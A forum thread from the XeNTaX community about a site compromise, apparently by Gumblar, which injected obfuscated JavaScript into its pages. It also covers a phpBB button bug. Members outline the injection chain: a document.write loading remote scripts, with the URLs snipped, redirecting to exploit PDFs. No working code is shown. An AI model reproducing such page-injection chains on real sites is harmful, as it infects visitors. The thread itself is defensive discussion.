XeNTaX

Yes. We will try to get everything back in. For now, new registrations have been disabled.

XpoZed wrote:I don't think there was a virus that is downloaded on your PC. It's more likely a session/cookie stealer or something.
Anyway, if someone can provide me with a sample (exe,dll,ocx,sys, etc.) i'll be happy to reverse engineer it (that's my main hobby these days ).

It was almost certainly Gumblar, based on de-obfuscating the obfuscated javascript which was inserted on numerous pages. Maybe not a virus, true, but still some type of malware.

It's worth noting that people with properly-upgraded Windows systems and Acrobat/Flash installations may not have had anything to worry about, but you should still run a virus scan just in case (this is one of the basic maintenance tasks you should be regularly running anyways).

One last note, we don't load any scripts, images, or other resources from external URLs (to the best of my knowledge; there may be a couple of images on the wiki loaded from Wikimedia Commons), so you should be able to safely block any such resources from loading.

chrrox wrote:im using firefox its only the mark forum read that does not work for me i can go into any thread and the mark read works.

Hmm. http://www.phpbb-seo.com/en/phpbb-forum ... e3678.html This seems to be a phpbb issue

Mr.Mouse wrote:

chrrox wrote:im using firefox its only the mark forum read that does not work for me i can go into any thread and the mark read works.

Hmm. http://www.phpbb-seo.com/en/phpbb-forum ... e3678.html This seems to be a phpbb issue

Looking at it again, it's an issue back in 2008, so I'm not sure how relevant it is now. Working in Chrome, the button functions as desired. We're still looking into it.

DMorrone wrote:Working in Chrome, the button functions as desired. We're still looking into it.

The button works in the subsections, like here, but doesn't work on the main forum index. I'm pretty sure it's not a browser issue. Tried it myself on Chrome, same result as in Firefox.

Craptain wrote:

DMorrone wrote:Working in Chrome, the button functions as desired. We're still looking into it.

The button works in the subsections, like here, but doesn't work on the main forum index. I'm pretty sure it's not a browser issue. Tried it myself on Chrome, same result as in Firefox.

Looks like there is a very recent debate as to how this button should ultimately function:

http://www.phpbb.com/community/viewtopi ... &t=2101636

Damn I was fucked hard by this virus. Wasn't able to work for 2 days cause of this shit.

Can anyone send me the virus ? The infected PDF or something will be fine too.

XpoZed wrote:Can anyone send me the virus ? The infected PDF or something will be fine too.

Turns out our computers were clean, or at least a multitude of scanners found nothing.

But whatever it was and where it came from, it injected the sites pages with this :

I didn't notice anything? What happens if you visit a site that's infected with it?
And what about the pdf etc. stuff? xentax doesn't use anything like flash, pdf...

Mr.Mouse wrote: Turns out our computers were clean, or at least a multitude of scanners found nothing.

But whatever it was and where it came from, it injected the sites pages with this :

Thanks, but i've already got this... it just do a document.write('<script type="text/javascript" src="URL SNIP"> </script>')
Then from URL SNIP we had similar script that do a document.write with script again, this time to something like URL SNIP, and there was only a redirect to google.com
That's why i've said that this is probably only a logger.

Anyway, if someone got the virus, i'll be happy to play with his bits'n bytes.

@Rheini i've seen similar javascript exploits like this one, that redirect the user to a PDF document with exploit in it. And if you already have installed acrobat reader, that is exploitable (old version etc), you get infected.

Thank god i don't have that damn Acrobat Reader installed at all (Foxit )
I do have Flash though (with Opera)

Registrations are back on.

Awesome! *registers 839583 dummy accounts*

While attempting to go to the page to download Noesis I got this while using firefox:



This is the link I followed: http://oasis.xentax.com/index.php?content=downloads

Edit: I see it was already reported in his Noesis thread. My apologies.